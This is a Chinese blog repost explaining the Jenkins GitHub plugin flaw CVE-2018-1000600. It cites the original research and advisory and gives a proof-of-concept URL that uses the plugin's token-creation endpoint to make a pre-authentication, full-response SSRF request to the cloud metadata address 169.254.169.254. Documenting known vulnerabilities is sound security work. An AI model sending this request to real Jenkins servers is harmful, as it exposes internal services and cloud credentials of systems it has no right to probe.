当前位置: 首页 > news >正文

Jenkins CVE-2018-1000600漏洞验证与SSRF攻击分析

Jenkins - CVE-2018-1000600 PoC

这是博客文章中的第二个漏洞利用

来源:https://blog.orange.tw/2019/01/hacking-jenkins-part-1-play-with-dynamic-routing.html

与CVE-2018-1000600链接形成预认证完全响应的SSRF
https://jenkins.io/security/advisory/2018-06-25/#SECURITY-915

这影响了默认安装的GitHub插件。然而,我了解到当您启动新的Jenkins实例时,它会拉取所有更新的插件(默认情况下)。我不确定人们多久设置一次默认更新到最新插件,但这似乎确实减少了一些此类问题。

漏洞利用适用于:GitHub Plugin 1.29.1及更早版本

当我在今天(2019年2月25日)安装Jenkins时,它默认安装了1.29.4版本,因此以下内容不起作用。

来自博客文章:

GitHub插件中的CSRF漏洞和缺失的权限检查允许捕获凭据

它可以使用Jenkins中已知凭据ID提取任何存储的凭据。但是,如果没有提供用户提供的值,凭据ID是一个随机UUID。因此,似乎无法利用此漏洞?(或者如果有人知道如何获取凭据ID,请告诉我!)

尽管没有已知凭据ID无法提取任何凭据,但仍有另一种攻击原语 - 完全响应的SSRF!我们都知道利用盲SSRF有多难,这就是为什么完全响应的SSRF如此有价值!

PoC:

http://jenkins.local/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword
?apiUrl=http://169.254.169.254/%23
&login=orange
&password=tsai

要获取旧版本的插件和信息,您可以访问:
https://wiki.jenkins.io/display/JENKINS/GitHub+Branch+Source+Plugin

下载旧版本:
https://updates.jenkins.io/download/plugins/github-branch-source/
https://updates.jenkins.io/download/plugins/github/
更多精彩内容 请关注我的个人公众号 公众号(办公AI智能小助手)
对网络安全、黑客技术感兴趣的朋友可以关注我的安全公众号(网络安全技术点滴分享)

公众号二维码

公众号二维码

http://www.jsqmd.com/news/37123/

相关文章:

  • 基于 Reactor 模式的 HTTP 协议扩展实现 - 详解
  • 2025年热门的高速导轨厂家最新TOP实力排行
  • 2025年口碑好的双轴芯导轨厂家最新实力排行
  • junit单元测试 - 实践
  • 2025年大型折叠遮阳蓬制造商排行榜单
  • 2025年口碑好的AB枕芯厂家推荐及选择指南
  • 2025年靠谱的组合式选粉机厂家最新推荐权威榜
  • 使用 xmake 固定 MinGW 工具链路径的配置方法
  • 2025年比较好的选粉机厂家推荐及选择参考
  • 2025年提分产品渠道哪家靠谱
  • 2025年平板类变压器实力厂家排行榜
  • 2025年知名的落石边坡防护网厂家最新推荐权威榜
  • 【动态规划】数位DP的原理、模板(封装类) - 教程
  • 在JMeter中利用地名查询天气预报并查看响应结果
  • 2025年靠谱的主动边坡防护网最新TOP品牌厂家排行
  • 2025年质量好的再生法兰绒行业内口碑厂家排行榜
  • biji-mysql
  • 2025年11月小户型油烟机型号排名榜:小厨房净烟方案实测
  • 哔哩哔哩网页端查看账号已注销视频
  • 在AI技术快速实现创意的时代,挖掘数学学习新需求成为关键挑战
  • 云调试
  • 文件上传使用分片,文件下载使用流式方案,同时还要实现进度条功能
  • HeavenHell
  • Why can people actually only speak one language
  • 基于MATLAB的3-PUU并联机构工作空间仿真分析
  • 基于氢氧燃料电池的分布式三相电力系统Simulink建模与仿真
  • sunk cost
  • 英皇热水器售后服务电话4009968065
  • 巧夫人油烟机售后服务电话4009968065
  • 爱多集成灶售后服务电话4009968065